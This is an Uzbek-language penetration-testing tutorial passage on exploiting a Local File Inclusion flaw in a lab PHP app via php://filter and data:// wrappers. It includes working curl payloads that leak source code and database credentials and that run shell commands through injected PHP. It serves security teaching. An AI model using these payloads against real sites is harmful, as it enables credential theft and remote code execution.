9.2.2. PHP Wrappers

PHP tilining imkoniyatlarini kengaytirish uchun turli xil protocol wrappers taqdim etadi. Masalan, PHP wrappers mahalliy yoki masofaviy fayl tizimlarini ifodalash va ularga kirish uchun ishlatilishi mumkin. Biz bu wrappers dan File Inclusion zaifliklari orqali PHP veb-ilovalarida filtrları chetlab o‘tish yoki kod ijrosini qo‘lga kiritish uchun foydalanishimiz mumkin. Biz faqat php://filter va data:// wrappers ni ko‘rib chiqsak-da, boshqa ko‘plab wrappers mavjud.

php://filter wrapper yordamida fayllarning tarkibini ROT13 yoki Base64 kabi kodlashsiz yoki kodlash bilan ko‘rsatishimiz mumkin. Oldingi bo‘limda LFI yordamida fayllarning tarkibini kiritishni ko‘rib chiqdik. php://filter yordamida biz .php kabi ijro etiladigan fayllarning tarkibini ijro etish o‘rniga ko‘rsatishimiz mumkin. Bu PHP fayllarini maxfiy ma'lumotlar uchun ko‘rib chiqish va veb-ilovaning mantiqiy tuzilishini tahlil qilish imkonini beradi.

Buni Mountain Desserts veb-ilovasiga qaytib, ko‘rsatib beramiz. Avval, o‘tgan o‘quv bo‘limida bo‘lgani kabi, page parametri uchun admin.php faylini qiymat sifatida kiritamiz.

kali@kali:~$ **curl <http://mountaindesserts.com/meteor/index.php?page=admin.php**>
...
<a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Maintenance</title>
</head>
<body>
        <span style="color:#F00;text-align:center;">The admin page is currently under maintenance.

Ro‘yxat 20 - admin.php faylining tarkibi

Ro‘yxat 20 da veb-ilovani avval ko‘rib chiqayotganimizda duch kelgan sarlavha va texnik xizmat matni ko‘rsatilgan. Shuningdek, HTML koddagi <body> yorlig‘i oxirida yopilmaganligini sezamiz. Bu nimadir yetishmayotgan deb taxmin qilishimiz mumkin. PHP kodi server tomonida ijro etiladi va shuning uchun ko‘rsatilmaydi. Ushbu chiqishni avvalgi kiritishlar bilan solishtirsak yoki brauzerda manba kodini ko‘rib chiqsak, index.php sahifasining qolgan tarkibi yetishmayotgan deb xulosa qilishimiz mumkin.

Endi faylni php://filter yordamida kiritib, bu holatni yaxshiroq tushunamiz. Birinchi urinishda hech qanday kodlash ishlatmaymiz. PHP wrapper filtrlanadigan fayl oqimi sifatida fayl nomini belgilash uchun zarur bo‘lgan resource parametridan foydalanadi. Ushbu parametrda mutlaq yoki nisbiy yo‘llarni ham belgilashimiz mumkin.

kali@kali:~$ **curl <http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php**>
...
<a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Maintenance</title>
</head>
<body>
        <span style="color:#F00;text-align:center;">The admin page is currently under maintenance.

Ro‘yxat 21 - Kodlanmagan admin.php ni kiritish uchun "php://filter" dan foydalanish

Ro‘yxat 21 chiqishi 20-ro‘yxat bilan bir xil natijani ko‘rsatadi. Bu mantiqiy, chunki PHP kodi LFI zaifligi orqali kiritiladi va ijro etiladi. Endi chiqishni base64 bilan kodlash uchun convert.base64-encode ni qo‘shamiz. Bu belgilangan resursni base64 satriga aylantiradi.

kali@kali:~$ **curl <http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php**>
...
<a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a>
**PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWFpbn...
dF9lcnJvcik7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSI7Cj8+Cgo8L2JvZHk+CjwvaHRtbD4K**
...

Ro‘yxat 22 - Base64 kodlangan admin.php ni kiritish uchun "php://filter" dan foydalanish

Ro‘yxat 22 da biz base64 kodlangan ma'lumotlarni kiritganimiz va sahifaning qolgan qismi to‘g‘ri yuklanganligi ko‘rsatilgan. Endi terminalda base64 dasturidan -d bayrog‘i bilan foydalanib, kodlangan ma'lumotlarni dekodlashimiz mumkin.

kali@kali:~$ **echo "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWFpbnRlbmFuY2U8L3RpdGxlPgo8L2hlYWQ+Cjxib2R5PgogICAgICAgIDw/cGhwIGVjaG8gJzxzcGFuIHN0eWxlPSJjb2xvcjojRjAwO3RleHQtYWxpZ246Y2VudGVyOyI+VGhlIGFkbWluIHBhZ2UgaXMgY3VycmVudGx5IHVuZGVyIG1haW50ZW5hbmNlLic7ID8+Cgo8P3BocAokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOwokdXNlcm5hbWUgPSAicm9vdCI7CiRwYXNzd29yZCA9ICJNMDBuSzRrZUNhcmQhMiMiOwoKLy8gQ3JlYXRlIGNvbm5lY3Rpb24KJGNvbm4gPSBuZXcgbXlzcWxpKCRzZXJ2ZXJuYW1lLCAkdXNlcm5hbWUsICRwYXNzd29yZCk7CgovLyBDaGVjayBjb25uZWN0aW9uCmlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiAkY29ubi0+Y29ubmVjdF9lcnJvcik7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSI7Cj8+Cgo8L2JvZHk+CjwvaHRtbD4K" | base64 -d**
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Maintenance</title>
</head>
<body>
        <?php echo '<span style="color:#F00;text-align:center;">The admin page is currently under maintenance.'; ?>

**<?php
$servername = "localhost";
$username = "root";
$password = "M00nK4keCard!2#";

// Create connection
$conn = new mysqli($servername, $username, $password);**
...

Ro‘yxat 23 - admin.php faylining base64 kodlangan tarkibini dekodlash

Dekodlangan ma'lumotlar MySQL ulanish ma'lumotlarini, shu jumladan foydalanuvchi nomi va parolni o‘z ichiga oladi. Ushbu hisob ma'lumotlaridan ma'lumotlar bazasiga ulanish yoki SSH orqali foydalanuvchi hisoblari uchun parolni sinab ko‘rish uchun foydalanishimiz mumkin.

php://filter wrapper fayl tarkibini kiritish uchun ishlatilishi mumkin bo‘lsa, data:// wrapper kod ijrosini qo‘lga kiritish uchun ishlatilishi mumkin. Ushbu wrapper ma'lumot elementlarini oddiy matn yoki base64 kodlangan ma'lumot sifatida ishlayotgan veb-ilova kodiga joylashtirish uchun ishlatiladi. Bu mahalliy faylni PHP kodi bilan zaharlash imkoni bo‘lmaganda alternativ usulni taklif qiladi.

Keling, Mountain Desserts veb-ilovasida data:// wrapper dan qanday foydalanishni ko‘rsataylik. Wrapper dan foydalanish uchun data:// dan keyin ma'lumot turi va tarkibni qo‘shamiz. Birinchi misolimizda, URL kodlangan kichik PHP parchasini veb-ilova kodiga joylashtirishga harakat qilamiz. Avvalgi kabi ls buyrug‘i bilan bir xil PHP parchasidan foydalanishimiz mumkin.

kali@kali:~$ **curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"**
...
<a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a>
admin.php
bavarian.php
css
fonts
img
index.php
js
...

Ro‘yxat 24 - ls ni ijro etish uchun "data://" wrapper dan foydalanish